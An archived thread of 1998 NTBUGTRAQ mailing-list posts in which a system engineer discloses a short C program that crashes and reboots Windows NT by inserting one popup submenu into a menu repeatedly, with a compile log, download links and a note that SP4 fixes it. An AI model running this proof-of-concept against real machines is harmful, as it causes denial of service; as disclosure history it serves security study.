---------- Forwarded message ----------
From: fill (fill@TCHERCOM.RU)
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Date: Wed, 21 Oct 1998 09:08:40 +0300
Subject: New NT Bug

Hi!
This small program reloads NT (but not win95).
Tested with SP4 RC also.
Enjoy!


#include 

int WINAPI WinMain(HINSTANCE hinstExe,
           HINSTANCE hinstPrev, LPSTR lpszCmdLine,
int nCmdShow)
{
  HMENU hMenu =3D CreatePopupMenu();
  HMENU hMenu1 =3D CreatePopupMenu();
  AppendMenu(hMenu1,MF_STRING, 1, "1");
  AppendMenu(hMenu1,MF_STRING, 2, "2");
  AppendMenu(hMenu1,MF_STRING, 3, "3");
  InsertMenu(hMenu,1,MF_POPUP|MF_STRING,(UINT)hMenu1,"1");
  InsertMenu(hMenu,2,MF_POPUP|MF_STRING,(UINT)hMenu1,"2");
  InsertMenu(hMenu,3,MF_POPUP|MF_STRING,(UINT)hMenu1,"3");
  InsertMenu(hMenu,4,MF_POPUP|MF_STRING,(UINT)hMenu1,"4");
  InsertMenu(hMenu,5,MF_POPUP|MF_STRING,(UINT)hMenu1,"5");
  InsertMenu(hMenu,6,MF_POPUP|MF_STRING,(UINT)hMenu1,"6");
  return 0;
}




-------------------------------------------------------------------------=
-------

Ilya Filatov
CherCom Co.,
The system engineer

-------------------------------------------------------------------------=
-------
From jericho@dimensional.com Tue Dec  1 13:49:09 1998
Date: Tue, 10 Nov 1998 04:00:46 -0700 (MST)
From: mea culpa 
To: root@repsec.com
Subject: New Bug - P.S. (fwd)



---------- Forwarded message ----------
From: Ilya Filatov 
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Date: Thu, 22 Oct 1998 10:08:03 +0300
Subject: New Bug - P.S.

Hi!
I ask to excuse for a small inaccuracy. "3D" (it was astonishing for all) -
only HEX-code of character "=". This character adds Microsoft Outlook,
if you use dispatch in HTML(which is established by default):).
Excuse, did not know about it. In total week I work with Outlook,
it is necessary, probably, to pass back on Netscape.

Concerning Bug:
-compiled on VC 6.0  (6.00.8168.2) any errors or the warnings were not (look
below)
-processor Pentium II
-tested on WinNt with SP3, SP4 RC, in 2 hours will arrive SP4 release - we
shall look.
-tested on computers PII, PI
All computers were reloaded without any problems!!!

Exe-file you may find on:
http://www.chat.ru/~fewsoft/bug.zip (8k)

VC 6 project  you may find on:
http://www.chat.ru/~fewsoft/bug_source.zip (5k)


Enjoy!
----------------------------------------------------------------------------
Ilya Filatov
CherCom Co.,
The system engineer
www.tchercom.ru
----------------------------------------------------------------------------




---------------------------------------------------------------------------
---------------------------------------------------------------------------
VC6 Message
---------------------------------------------------------------------------
---------------------------------------------------------------------------

Deleting intermediate files and output files for project ' bug - Win32
Release '.
-------------------- Configuration: bug - Win32 Release --------------------
Compiling...
bug1.cpp
Linking...

bug.exe - 0 error (s), 0 warning (s)

-------------------------------
-------------------------------
Source code
-------------------------------
-------------------------------
#include 

int WINAPI WinMain (HINSTANCE hinstExe,
           HINSTANCE hinstPrev, LPSTR lpszCmdLine,
int nCmdShow)
{
  HMENU hMenu = CreatePopupMenu ();
  HMENU hMenu1 = CreatePopupMenu ();
  AppendMenu (hMenu1, MF_STRING, 1, "1");
  AppendMenu (hMenu1, MF_STRING, 2, "2");
  AppendMenu (hMenu1, MF_STRING, 3, "3");
   InsertMenu(hMenu,1,MF_POPUP|MF_STRING,(UINT)hMenu1,"1");
   InsertMenu(hMenu,2,MF_POPUP|MF_STRING,(UINT)hMenu1,"2");
   InsertMenu(hMenu,3,MF_POPUP|MF_STRING,(UINT)hMenu1,"3");
   InsertMenu(hMenu,4,MF_POPUP|MF_STRING,(UINT)hMenu1,"4");
   InsertMenu(hMenu,5,MF_POPUP|MF_STRING,(UINT)hMenu1,"5");
   InsertMenu(hMenu,6,MF_POPUP|MF_STRING,(UINT)hMenu1,"6");
  return 0;
}
From jericho@dimensional.com Tue Dec  1 13:49:12 1998
Date: Tue, 10 Nov 1998 04:00:52 -0700 (MST)
From: mea culpa 
To: root@repsec.com
Subject: New NT Bug P.S. last (fwd)



---------- Forwarded message ----------
From: Ilya Filatov 
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Date: Thu, 22 Oct 1998 15:36:18 +0400
Subject: New NT Bug P.S. last

Hi!
This bug don't work after installing SP4 Release !
 ---------------------------------------------------------------------------
------------
Ilya Filatov
CherCom Co.,
The system engineer
www.tchercom.ru
----------------------------------------------------------------------------
-----------